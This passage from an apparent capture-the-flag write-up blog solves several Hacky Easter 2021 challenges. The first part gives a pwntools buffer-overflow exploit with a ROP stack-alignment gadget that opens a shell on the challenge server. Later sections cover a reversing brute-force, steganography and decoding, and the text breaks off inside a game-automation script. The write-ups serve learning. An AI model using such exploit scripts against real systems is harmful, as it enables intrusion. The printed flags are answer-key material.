Interrupted\r\n[*] Got EOF while reading in interactive\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf you have experienced this behavior before, it&#8217;s quite obvious what is wrong. Otherwise it can be tough.\r\n<\/p>\r\n\r\n<p>\r\nWe can assume that the binary on the target server is exactly the same. What is probably not the same is the <span class=\"hl\">glibc<\/span>. Some versions of it error out when the stack is not correctly <span class=\"hl\">16 byte<\/span> aligned. In order to fix this, we simply need to add a gadget to a <span class=\"hl\">ret<\/span> instruction (<span class=\"hl\">rop nop<\/span>), which effectively does nothing but consuming 8 bytes from the stack. This realigns the stack correctly.\r\n<\/p>\r\n\r\n<p>\r\nWe can for example use <span class=\"hl\">ROPgadget<\/span> to find an appropriate gadget:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ ROPgadget --binary lotl| grep ': ret'\r\n0x00000000004005ee : ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe adjusted exploit script looks like this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 40\r\nprofit = 0x0040086d\r\n<span class=\"hl2\">ropnop = 0x004005ee<\/span>\r\n\r\nio = remote('46.101.107.117', 2102)\r\n\r\nexpl = b'A'*offset\r\n<span class=\"hl2\">expl += p64(ropnop)<\/span>\r\nexpl += p64(profit)\r\n\r\nio.sendlineafter('name!', expl)\r\nio.interactive()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf we now run the script, it also works remotely:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ .\/expl.py \r\n[+] Opening connection to 46.101.107.117 on port 2102: Done\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\xee@, nice to meet you!\r\n$ id\r\nuid=1000(ctf) gid=1000(ctf) groups=1000(ctf)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we simply need to read the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n$ ls -al\r\ntotal 56\r\ndrwxr-xr-x 1 root root  4096 Mar  2 18:31 .\r\ndrwxr-xr-x 1 root root  4096 Mar  2 18:31 ..\r\n-rw-r--r-- 1 root root   220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 root root  3771 Apr  4  2018 .bashrc\r\n-rw-r--r-- 1 root root   807 Apr  4  2018 .profile\r\n-rwxrwxr-x 1 root root  8848 Mar  2 18:30 challenge1\r\n-rw-rw-r-- 1 root root    40 Mar  2 18:30 flag\r\n-rwxrwxr-x 1 root root 18744 Mar  2 18:30 ynetd\r\n$ cat flag\r\nhe2021{w3ll_th4t_w4s_4_s1mpl3_p4yl04d}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{w3ll_th4t_w4s_4_s1mpl3_p4yl04d}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_17\">HE21.17 Digizzled<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge17.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">5 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Reversing<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHad a flag, but it got digizzled. Can you recover it?\r\n\r\n-------------------------------------  \r\n      o                  o             \r\n      | o      o         |             \r\n    o-O   o--o   o-o o-o | o-o o-o     \r\n   |  | | |  | |  \/   \/  | |-' |       \r\n    o-o | o--O | o-o o-o o o-o o       \r\n             |                         \r\n         o--o                          \r\n-------------------------------------  \r\nenter flag: [REDACTED]    \r\ndigizzling...  \r\nc5ab05ca73f205ca  \r\n\r\n<span class=\"fake_link\">digizzle<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided text file contains the disassembly of a python script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/17]\r\n\u2514\u2500$ cat digizzle     \r\n  1           0 LOAD_CONST               0 (0)\r\n              2 LOAD_CONST               1 (None)\r\n              4 IMPORT_NAME              0 (re)\r\n              6 STORE_NAME               0 (re)\r\n\r\n  2           8 LOAD_NAME                0 (re)\r\n             10 LOAD_METHOD              1 (compile)\r\n             12 LOAD_CONST               2 ('^he2021\\\\{([dlsz134]){9}\\\\}$')\r\n             14 CALL_METHOD              1\r\n             16 STORE_NAME               2 (pattern)\r\n\r\n  4          18 LOAD_CONST               3 (&lt;code object hizzle at 0x10b3ad270, file \"digizzle.py\", line 4&gt;)\r\n             20 LOAD_CONST               4 ('hizzle')\r\n             22 MAKE_FUNCTION            0\r\n             24 STORE_NAME               3 (hizzle)\r\n\r\n 12          26 LOAD_CONST               5 (&lt;code object smizzle at 0x10b3ad9c0, file \"digizzle.py\", line 12&gt;)\r\n             28 LOAD_CONST               6 ('smizzle')\r\n             30 MAKE_FUNCTION            0\r\n             32 STORE_NAME               4 (smizzle)\r\n\r\n 15          34 LOAD_NAME                5 (print)\r\n             36 LOAD_CONST               7 ('-------------------------------------')\r\n             38 CALL_FUNCTION            1\r\n             40 POP_TOP\r\n\r\n 16          42 LOAD_NAME                5 (print)\r\n             44 LOAD_CONST               8 ('      o                  o           ')\r\n             46 CALL_FUNCTION            1\r\n             48 POP_TOP\r\n\r\n 17          50 LOAD_NAME                5 (print)\r\n             52 LOAD_CONST               9 ('      | o      o         |           ')\r\n             54 CALL_FUNCTION            1\r\n             56 POP_TOP\r\n\r\n 18          58 LOAD_NAME                5 (print)\r\n             60 LOAD_CONST              10 ('    o-O   o--o   o-o o-o | o-o o-o   ')\r\n             62 CALL_FUNCTION            1\r\n             64 POP_TOP\r\n\r\n 19          66 LOAD_NAME                5 (print)\r\n             68 LOAD_CONST              11 (\"   |  | | |  | |  \/   \/  | |-' |     \")\r\n             70 CALL_FUNCTION            1\r\n             72 POP_TOP\r\n\r\n 20          74 LOAD_NAME                5 (print)\r\n             76 LOAD_CONST              12 ('    o-o | o--O | o-o o-o o o-o o     ')\r\n             78 CALL_FUNCTION            1\r\n             80 POP_TOP\r\n\r\n 21          82 LOAD_NAME                5 (print)\r\n             84 LOAD_CONST              13 ('             |                       ')\r\n             86 CALL_FUNCTION            1\r\n             88 POP_TOP\r\n\r\n 22          90 LOAD_NAME                5 (print)\r\n             92 LOAD_CONST              14 ('         o--o                        ')\r\n             94 CALL_FUNCTION            1\r\n             96 POP_TOP\r\n\r\n 23          98 LOAD_NAME                5 (print)\r\n            100 LOAD_CONST               7 ('-------------------------------------')\r\n            102 CALL_FUNCTION            1\r\n            104 POP_TOP\r\n\r\n 24         106 LOAD_NAME                6 (input)\r\n            108 LOAD_CONST              15 ('enter flag:')\r\n            110 CALL_FUNCTION            1\r\n            112 STORE_NAME               7 (s)\r\n\r\n 25         114 LOAD_NAME                2 (pattern)\r\n            116 LOAD_METHOD              8 (match)\r\n            118 LOAD_NAME                7 (s)\r\n            120 CALL_METHOD              1\r\n            122 POP_JUMP_IF_FALSE      174\r\n\r\n 26         124 LOAD_NAME                5 (print)\r\n            126 LOAD_CONST              16 ('digizzling...')\r\n            128 CALL_FUNCTION            1\r\n            130 POP_TOP\r\n\r\n 27         132 LOAD_NAME                3 (hizzle)\r\n            134 LOAD_NAME                7 (s)\r\n            136 CALL_FUNCTION            1\r\n            138 STORE_NAME               9 (a)\r\n\r\n 28         140 LOAD_NAME                3 (hizzle)\r\n            142 LOAD_NAME                7 (s)\r\n            144 LOAD_CONST               1 (None)\r\n            146 LOAD_CONST               1 (None)\r\n            148 LOAD_CONST              17 (-1)\r\n            150 BUILD_SLICE              3\r\n            152 BINARY_SUBSCR\r\n            154 CALL_FUNCTION            1\r\n            156 STORE_NAME              10 (b)\r\n\r\n 29         158 LOAD_NAME                5 (print)\r\n            160 LOAD_NAME                4 (smizzle)\r\n            162 LOAD_NAME                9 (a)\r\n            164 LOAD_NAME               10 (b)\r\n            166 CALL_FUNCTION            2\r\n            168 CALL_FUNCTION            1\r\n            170 POP_TOP\r\n            172 JUMP_FORWARD             8 (to 182)\r\n\r\n 31     &gt;&gt;  174 LOAD_NAME                5 (print)\r\n            176 LOAD_CONST              18 ('wrong format!')\r\n            178 CALL_FUNCTION            1\r\n            180 POP_TOP\r\n        &gt;&gt;  182 LOAD_CONST               1 (None)\r\n            184 RETURN_VALUE\r\n\r\nDisassembly of &lt;code object hizzle at 0x10b3ad270, file \"digizzle.py\", line 4&gt;:\r\n  5           0 LOAD_CONST               1 (13)\r\n              2 STORE_FAST               1 (s1)\r\n\r\n  6           4 LOAD_CONST               2 (37)\r\n              6 STORE_FAST               2 (s2)\r\n\r\n  7           8 SETUP_LOOP              52 (to 62)\r\n             10 LOAD_GLOBAL              0 (range)\r\n             12 LOAD_GLOBAL              1 (len)\r\n             14 LOAD_FAST                0 (s)\r\n             16 CALL_FUNCTION            1\r\n             18 CALL_FUNCTION            1\r\n             20 GET_ITER\r\n        &gt;&gt;   22 FOR_ITER                36 (to 60)\r\n             24 STORE_FAST               3 (n)\r\n\r\n  8          26 LOAD_FAST                1 (s1)\r\n             28 LOAD_GLOBAL              2 (ord)\r\n             30 LOAD_FAST                0 (s)\r\n             32 LOAD_FAST                3 (n)\r\n             34 BINARY_SUBSCR\r\n             36 CALL_FUNCTION            1\r\n             38 BINARY_ADD\r\n             40 LOAD_CONST               3 (65521)\r\n             42 BINARY_MODULO\r\n             44 STORE_FAST               1 (s1)\r\n\r\n  9          46 LOAD_FAST                1 (s1)\r\n             48 LOAD_FAST                2 (s2)\r\n             50 BINARY_MULTIPLY\r\n             52 LOAD_CONST               3 (65521)\r\n             54 BINARY_MODULO\r\n             56 STORE_FAST               2 (s2)\r\n             58 JUMP_ABSOLUTE           22\r\n        &gt;&gt;   60 POP_BLOCK\r\n\r\n 10     &gt;&gt;   62 LOAD_FAST                2 (s2)\r\n             64 LOAD_CONST               4 (16)\r\n             66 BINARY_LSHIFT\r\n             68 LOAD_FAST                1 (s1)\r\n             70 BINARY_OR\r\n             72 RETURN_VALUE\r\n\r\nDisassembly of &lt;code object smizzle at 0x10b3ad9c0, file \"digizzle.py\", line 12&gt;:\r\n 13           0 LOAD_GLOBAL              0 (format)\r\n              2 LOAD_FAST                0 (a)\r\n              4 LOAD_CONST               1 ('x')\r\n              6 CALL_FUNCTION            2\r\n              8 LOAD_GLOBAL              0 (format)\r\n             10 LOAD_FAST                1 (b)\r\n             12 LOAD_CONST               1 ('x')\r\n             14 CALL_FUNCTION            2\r\n             16 BINARY_ADD\r\n             18 RETURN_VALUE\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nI went through the disassembly line by line and reimplemented the script.\r\n<\/p>\r\n\r\n<p>\r\nBecause of the provided regex <span class=\"hl\">&#8216;^he2021\\\\{([dlsz134]){9}\\\\}$&#8217;<\/span>, we now that the alphabet for the flag is <span class=\"hl\">dlsz134<\/span> and the length is <span class=\"hl\">9<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nBy using a simple bruteforce arround the reimplemented script, we can determine the correct flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\ndef hizzle(s): # line 4\r\n  s1=13\r\n  s2=37\r\n  for n in range(len(s)):\r\n    s1 = (s1 + ord(s[n])) % 65521\r\n    s2 = (s1*s2) % 65521\r\n  return s1 + (s2&lt;&lt;16)\r\n\r\ndef smizzle(a,b): # line 12\r\n  return format(a,'x')+format(b,'x')\r\n\r\nprint('-------------------------------------')\r\nprint('      o                  o           ')\r\nprint('      | o      o         |           ')\r\nprint('    o-O   o--o   o-o o-o | o-o o-o   ')\r\nprint(\"   |  | | |  | |  \/   \/  | |-' |     \")\r\nprint('    o-o | o--O | o-o o-o o o-o o     ')\r\nprint('             |                       ')\r\nprint('         o--o                        ')\r\nprint('-------------------------------------')\r\n\r\nalpha = 'dlsz134'\r\n\r\nfor a1 in alpha:\r\n for a2 in alpha:\r\n  for a3 in alpha:\r\n   for a4 in alpha:\r\n    for a5 in alpha:\r\n     for a6 in alpha:\r\n      for a7 in alpha:\r\n       for a8 in alpha:\r\n        for a9 in alpha:\r\n\r\n         #input('enter flag:')\r\n         s = 'he2021{'+a1+a2+a3+a4+a5+a6+a7+a8+a9+'}'\r\n\r\n         #if (not pattern.match(s)): print('fail')\r\n         a = hizzle(s)\r\n         b = hizzle(s[::-1])\r\n         if (smizzle(a,b) == 'c5ab05ca73f205ca'):\r\n           print(s)\r\n           quit()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nA few seconds after running the script, the flag is printed:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/17]\r\n\u2514\u2500$ .\/brut0r.py                \r\n-------------------------------------\r\n      o                  o           \r\n      | o      o         |           \r\n    o-O   o--o   o-o o-o | o-o o-o   \r\n   |  | | |  | |  \/   \/  | |-' |     \r\n    o-o | o--O | o-o o-o o o-o o     \r\n             |                       \r\n         o--o                        \r\n-------------------------------------\r\nhe2021{d1s4zzl3d}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{d1s4zzl3d}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_18\">HE21.18 Bunny Beat<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge18.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">5 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Stego<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThe bunnies have discovered minimal beats!\r\n\r\nBut where is the flag?\r\n\r\n<span class=\"fake_link\">bunnybeat.wav<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nI used <a href=\"https:\/\/www.sonicvisualiser.org\/download.html\" rel=\"noopener noreferrer\" target=\"_blank\">Sonic Visualiser<\/a> to open the provided <span class=\"hl\">.wav<\/span> file.\r\n<\/p>\r\n\r\n<p>\r\nBy choosing <span class=\"hl\">Layer<\/span> <span class=\"hl\">-&gt;<\/span> <span class=\"hl\">Add Spectrogram<\/span> the spectrogram can be displayed, which contains the flag:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_18_01.jpg\" alt=\"Spectro\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{Sp3ctrogramsROCK!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_19\">HE21.19 &#x1F608;<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge19.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">5 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nOne of the bunnies made a new friend. But when asked for the name, he only got the response below.\r\n\r\nCan you find out the friend's <b>name<\/b>, in <b>UPPERCASE<\/b>?\r\n\r\n&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;\r\n\r\nflag format: <span class=\"hl\">he2021{JOHNDOE}<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nWe need the name of what you find, in UPPERCASE, and wrapped in <span class=\"hl\">he2021{...}<\/span>.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nYet again <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> can be used to solve this challenge.\r\n<\/p>\r\n\r\n<p>\r\nAt first we replace the white squares (&#x25AB;) with a <span class=\"hl\">0<\/span> and the devil smileys (&#x1F608;) with a <span class=\"hl\">1<\/span> using <span class=\"hl\">Find \/ Replace<\/span>. The resulting bit stream can be converted to ASCII using <span class=\"hl\">From Binary<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_19_01.png\" alt=\"Flag\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThis results in the number <span class=\"hl\">1000000000000066600000000000001<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nBy googling for this number, we can find out that this is actually a prime number called <a href=\"https:\/\/en.wikipedia.org\/wiki\/Belphegor%27s_prime\" rel=\"noopener noreferrer\" target=\"_blank\">Belphegor&#8217;s prime<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the name we are looking for is <span class=\"hl\">belphegor<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{BELPHEGOR}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_20\">HE21.20 Run Me, Baby!<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge20.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">5 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Reversing<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThis one's easy, ain't it? Just run the <span class=\"hl\">.class<\/span> file. Hope you like Java!\r\n\r\n<span class=\"fake_link\">runme.class<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nIn order to run the provided <span class=\"hl\">.class<\/span> file, I downloaded <span class=\"hl\">groovy-3.0.7.jar<\/span> from <a href=\"https:\/\/mvnrepository.com\/artifact\/org.codehaus.groovy\/groovy\/3.0.7\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nI already had different versions of java installed. <span class=\"hl\">java-14-openjdk<\/span> worked fine by providing <span class=\"hl\">groovy-3.0.7.jar<\/span> (as well as the current directory) within the class path:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n$ \/usr\/lib\/jvm\/java-14-openjdk-amd64\/bin\/java -cp \".\/groovy-3.0.7.jar:.\" runme\r\nPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\r\nThe flag is: he2021{isnt_17_gr00vy_baby?}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{isnt_17_gr00vy_baby?}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_21\">HE21.21 Memeory 3.0 &#8211; The Finale<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge21.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">6 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>otaku<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWe finally fixed Memeory 2.0 and proudly release Memeory 3.0 aka the supersecure-Memeory.\r\n\r\nFlagbounty for everyone who can solve 10 successive rounds. Time per round is 30 seconds and only 3 missclicks are allowed.\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2107<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nNot solvable via UI\/browser, really.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe <span class=\"hl\">Memeory<\/span> is a real classic from HackyEaster: <a href=\"https:\/\/devel0pment.de\/?p=461#chlg04\" rel=\"noopener noreferrer\" target=\"_blank\">Memeory 2018<\/a>, <a href=\"https:\/\/devel0pment.de\/?p=1528#chlg11\" rel=\"noopener noreferrer\" target=\"_blank\">Memeory 2.0 2019<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nThis third iteration is even more challenging:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_01.png\" alt=\"Memeory\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe major challenge this time was that the single pictures were always slightly modified by the server. This includes not only rotating but also coloring:\r\n<\/p>\r\n\r\n<p>\r\n<table>\r\n<tr>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_02.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_03.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_04.jpg\"\/><\/td>\r\n<\/tr>\r\n<tr>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_05.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_06.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_07.jpg\"\/><\/td>\r\n<\/tr>\r\n<\/table>\r\n<\/p>\r\n\r\n<p>\r\nThis made is more challenging to compare the pictures in order to find the correct pairs.\r\n<\/p>\r\n\r\n<p>\r\nI used to following (far from being good, but working) strategy:\r\n<\/p>\r\n\r\n<p>\r\n<ul>\r\n<li>Retrieve the images in multiple threads and for each store the 4 possible rotations in a <span class=\"hl\">PIL.Image<\/span> object<\/li>\r\n<li>Try to find matches by using the <span class=\"hl\">difference<\/span> image from <span class=\"hl\">PIL.ImageChops<\/span> (only works if the coloring is the same)<\/li>\r\n<li>Try to find matches by looking for images where the difference in the RGB values for each pixel is quite low<\/li>\r\n<li>Try to find matches by looking for equal dimensions<\/li>\r\n<\/ul>\r\n<\/p>\r\n\r\n<p>\r\nThis resulted in the following script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport requests\r\nimport random\r\nfrom PIL import Image\r\nfrom PIL import ImageChops\r\nfrom threading import Thread\r\n\r\nurl = 'http:\/\/46.101.107.117:2107'\r\n\r\nclass ImageGett0r(Thread):\r\n\r\n  def __init__(self, s, imgs, n):\r\n    super(ImageGett0r, self).__init__()\r\n    self.s = s\r\n    self.imgs = imgs\r\n    self.n = n\r\n\r\n  def run(self):\r\n    for i in self.n:\r\n      r = self.s.get(url+'\/pic\/'+str(i))\r\n      open('.\/pic\/'+str(i), 'wb').write(r.content)\r\n      img = Image.open('.\/pic\/'+str(i))\r\n      for j in range(4):\r\n        self.imgs[str(i)+'_'+str(j)] = img.rotate(90*j)\r\n\r\ndef are_the_same(i1, i2):\r\n  if (i1.size[0] == 200 and i1.size[1] == 200 and i2.size[0] == 200 and i2.size[1] == 200):\r\n    diff = ImageChops.difference(i1, i2)\r\n\r\n    # difference is actually empty? got a match!\r\n    if (not diff.getbbox()): return True\r\n\r\n    if (diff.getbbox()[0] &gt; 0 or diff.getbbox()[1] &gt; 0): return True\r\n\r\n    # if each RGB value in the diff image is quite low, the images are probably the same\r\n    pix = diff.load()\r\n    for w in range(diff.size[0]):\r\n      for h in range(diff.size[1]):\r\n        p = pix[w,h]\r\n        for s in range(3):\r\n          if (p[s] &gt; 100): return False\r\n    return True\r\n\r\n  # a few strange dimensions.. luckily only one pair per dimension\r\n  for d in [150, 193, 201, 211]:\r\n    if ((i1.size[0] == d or i1.size[1] == d) and (i2.size[0] == d or i2.size[1] == d)): return True\r\n  return False\r\n\r\ns = requests.Session()\r\n\r\nfor rnd in range(1,11):\r\n  print('Round '+str(rnd)+'\/10')\r\n  r = s.get(url)\r\n  imgs = {}\r\n  ts = []\r\n  for i in range(1,99,14):\r\n    t = ImageGett0r(s, imgs, list(range(i,i+14)))\r\n    t.start()\r\n    ts.append(t)\r\n  for t in ts: t.join()\r\n\r\n  matches = []\r\n  for i in range(1,99):\r\n    for j in range(1,99):\r\n      if (i == j): continue\r\n      for x in range(4):\r\n        if (are_the_same(imgs[str(i)+'_0'], imgs[str(j)+'_'+str(x)])):\r\n          if ((i,j) not in matches and (j,i) not in matches):\r\n            matches.append((i,j))\r\n            break\r\n\r\n  print('- found ' + str(len(matches))+' matches')\r\n  left = []\r\n  for i in range(1,99):\r\n    ok = False\r\n    for m in matches:\r\n      if (i == m[0] or i == m[1]):\r\n        ok = True\r\n        break\r\n    if (not ok): left.append(i)\r\n  print('pairs left: ' + str(left))\r\n  random.shuffle(left)\r\n  while 